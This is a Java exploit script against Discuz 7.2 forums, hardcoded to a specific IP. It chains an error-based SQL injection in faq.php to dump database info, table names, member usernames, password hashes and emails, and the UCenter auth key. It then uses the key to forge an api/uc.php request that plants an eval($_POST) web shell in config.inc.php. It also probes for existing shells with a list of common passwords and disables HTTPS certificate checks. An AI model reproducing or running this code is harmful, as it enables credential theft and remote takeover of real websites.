Discuz7.2.java
检测shell、获取基本信息、列当前数据下举所有表、统计会员数量、输出前20位会员id+密码+email、getshell
import java.io.ByteArrayOutputStream;
import java.io.UnsupportedEncodingException;
import java.net.URL;
import java.net.URLConnection;
import java.net.URLEncoder;
import java.util.ArrayList;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import org.apache.commons.codec.binary.Base64;
import org.apache.commons.codec.digest.DigestUtils;
import org.apache.commons.io.IOUtils;
public class Discuz extends Thread {
static int i = 0;
/**
* 模拟PHP的microtime函数
* @return
*/
public static String microtime(){
String a = String.valueOf(System.nanoTime());
return "0."+a.substring(10,a.length()-1)+" "+a.substring(0,10);
}
/**
* 拼byte数组
* @param b
* @return
*/
protected static byte[] toByteArray(Byte[] b) {
ByteArrayOutputStream bos = new ByteArrayOutputStream();
for (byte bs : b) {
bos.write(bs);
}
return bos.toByteArray();
}
/**
* Discuz 授权 Encode
* @param $string
* @param ucKey
* @return
*/
public static String auth(String $string,String ucKey){
int $ckey_length = 4;
String $key = DigestUtils.md5Hex(ucKey);
String $keya = DigestUtils.md5Hex($key.substring(0,16));
String $keyb = DigestUtils.md5Hex($key.substring(16,32));
String microtime = DigestUtils.md5Hex(microtime());
String $keyc = microtime.substring(microtime.length()-$ckey_length,microtime.length());
String $cryptkey = $keya+DigestUtils.md5Hex($keya+$keyc);
String sb = DigestUtils.md5Hex($string+$keyb).substring(0,16);
$string = String.format("%010d", 0 )+sb+$string;
int $string_length = $string.length();
Map<Integer,Integer> box = new LinkedHashMap<Integer, Integer>();
for (int i = 0; i <= 255; i++) {
box.put(i, i);
}
List<Integer> ls = new ArrayList<Integer>();
char[] $cryptkeyArray = $cryptkey.toCharArray();
int r = 0;
for (int i = 0; i <= 255; i++) {
r = r==$cryptkeyArray.length?0:r;
ls.add((int)$cryptkeyArray[r]);
r ++;
}
int p = 0;
for(int i= 0; i < 256; i++) {
int $tmp = (Integer)box.get(i);
p = (p+$tmp + ls.get(i)) % 256;
box.put(i, box.get(p));
box.put(p, $tmp);
}
List<Byte> bs = new ArrayList<Byte>();
char[] $stringArray = $string.toCharArray();
int a=0,j=0;
for(int i = 0; i < $string_length; i++) {
a = (a + 1) % 256;
j = (j + box.get(a)) % 256;
int $tmp = box.get(a);
box.put(a, box.get(j));
box.put(j, $tmp);
int s = ((int)$stringArray[i] ^ box.get((box.get(a) + box.get(j)) % 256));
bs.add((byte)s);
}
byte[] bb = toByteArray(bs.toArray(new Byte[bs.size()]));
return $keyc+(Base64.encodeBase64String(bb).replace("=", ""));
}
/**
* 模拟PHP的time函数
* @return
*/
public static String time(){
return String.valueOf(System.currentTimeMillis()).substring(0,10);
}
/**
* 发送POST请求
* @param $cmd
* @param $url
* @param timeOut
* @return
*/
public static String send(String $cmd,String $url,int timeOut){
try {
URL u = new URL($url);
//忽略HTTPS请求证书验证
if("https".equalsIgnoreCase(u.getProtocol())){
SslUtils.ignoreSsl();
}
URLConnection conn = u.openConnection();
conn.setConnectTimeout(timeOut);
conn.setReadTimeout(timeOut);
conn.setDoOutput(true);
conn.setDoInput(true);
conn.getOutputStream().write($cmd.getBytes());
return IOUtils.toString(conn.getInputStream(),"UTF-8");
} catch (Exception e) {
e.printStackTrace();
}
return $url;
}
public void test(String $url,String ucKey){
String timestamp = String.valueOf(Long.parseLong(time())+10*3600);
try {
String $code = URLEncoder.encode(auth("time="+timestamp+"&action=updateapps", ucKey),"UTF-8");
String $cmd1="<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><root><item id=\"UC_API\">xxx\');eval($_POST[xxs]);//</item></root>";
String $cmd2="<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><root><item id=\"UC_API\">aaa</item></root>";
String $html1 = send($cmd1, $url+$code, 5000);
System.out.println($html1);
String $html2 = send($cmd2, $url+$code, 5000);
System.out.println($html2);
} catch (UnsupportedEncodingException e) {
e.printStackTrace();
}
}
public static String getRequest(String url,String action,int timeOut) throws Exception{
URL u = new URL(url);
URLConnection conn = u.openConnection();
conn.setConnectTimeout(timeOut);
conn.setReadTimeout(timeOut);
conn.setDoOutput(true);
conn.getOutputStream().write(action.getBytes());
return IOUtils.toString(conn.getInputStream(),"GBK");
}
public synchronized int get(){
return i++;
}
public String getR(String url,String action) throws Exception{
String str = getRequest(url,action,5000);
String reg = "\\{#(.*)#\\}";
Matcher m = Pattern.compile(reg).matcher(str);
if(m.find()){
return m.group(1);
}
return "";
}
public void startX(){
String url = "http://218.249.66.48/dz7.2/faq.php";
String exp = "action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,($sql),0x3a)x from information_schema.tables group by x)a)%23";
try {
System.out.println("-----------------------检查是否存在shell----------------------");
String t = url.substring(0,url.indexOf("faq.php"));
String[] arr = "cmd,xxx,a,cao,i0day,caonima,2119,air,config,moon,1,moi1,DOM,g,pwd,xss".split(",");
for (int i = 0; i < arr.length; i++) {
String y = send(arr[i]+"=echo 12345;", t+"/config.inc.php", 5000);
if(y.contains("12345")){
System.out.println("Shell:"+t+"/config.inc.php\t\t密码:"+arr[i]+"\r\n");
return ;
}
}
System.out.println("---------------------info------------------------");
String info = getR(url, exp.replace("$sql", "select concat(0x7b,0x23,version(),0x23,user(),0x23,database(),0x23,0x7D) from INFORMATION_SCHEMA.TABLES where table_schema=database() limit 0,1"));
System.out.println(info);
int len1 = Integer.parseInt(getR(url, exp.replace("$sql", "select concat(0x7b,0x23,count(1),0x23,0x7D) from INFORMATION_SCHEMA.TABLES where table_schema=database() limit 0,1")));
String pre = "cdb";
String applications = "cdb_uc_applications";
System.out.println("----------------------table-----------------------");
boolean install = false;
for (int i = 0; i < len1; i++) {
String str = getR(url, exp.replace("$sql", "select concat(0x7b,0x23,table_name,0x23,0x7D) from INFORMATION_SCHEMA.TABLES where table_schema=database() limit "+i+",1")).replace("[Table]", "cdb_");
if(str.contains("forums")){
pre = str.indexOf("_")!=-1?str.substring(0,str.indexOf("_")+1):"";
}
if(str.contains("applications")){
applications = str;
install = true;
}
System.out.println(str);
}
System.out.println("---------------------members------------------------");
try {
int len2 = Integer.parseInt(getR(url, exp.replace("$sql", "select concat(0x7b,0x23,count(1),0x23,0x7D) from "+pre+"members" +" limit 0,1")));
System.out.println("会员总数量:"+len2);
for (int i = 0; i < (len2>20?20:len2);i++) {
String str = getR(url, exp.replace("$sql", "select concat(0x7b,0x23,uid,0x2c,username,0x2c,password,0x2c,email,0x23,0x7D) from "+pre+"members" +" limit "+i+",1"));
if(!"".equals(str)){
System.out.println(str);
}
}
} catch (Exception e) {
System.out.println(e.toString());
}
if(!install){
System.out.println("没有找到applications,程序退出,");
return ;
}
System.out.println("-----------------------discuz表前缀:"+(pre.length()==0?"没有前缀":pre)+"----------------------");
System.out.println("-----------------------uc_key----------------------");
int len3 = Integer.parseInt(getR(url, exp.replace("$sql", "select concat(0x7b,0x23,length(authkey),0x23,0x7D) from "+applications +" limit 0,1")));
StringBuilder sb = new StringBuilder();
for (int i = 1; i <= len3/32+1; i++) {
String sql = exp.replace("$sql", "select concat(0x7b,0x23,substr(authkey,"+((i-1)*32+1)+",32),0x23,0x7D) from "+applications +" limit 0,1");
sb.append(getR(url, sql));
}
System.out.println(sb);
System.out.println("-----------------------getshell----------------------");
String a = url.substring(0,url.indexOf("faq.php"));
test(a+"/api/uc.php?code=", sb.toString());
String b = send("xxs=echo 12345;", a+"/config.inc.php", 5000);
if(b.contains("12345")){
System.out.println("Shell:"+a+"/config.inc.php\r\n");
}
} catch (Exception e) {
e.printStackTrace();
}
}
public static void main(String[] args) throws Exception {
new Discuz().startX();
}
}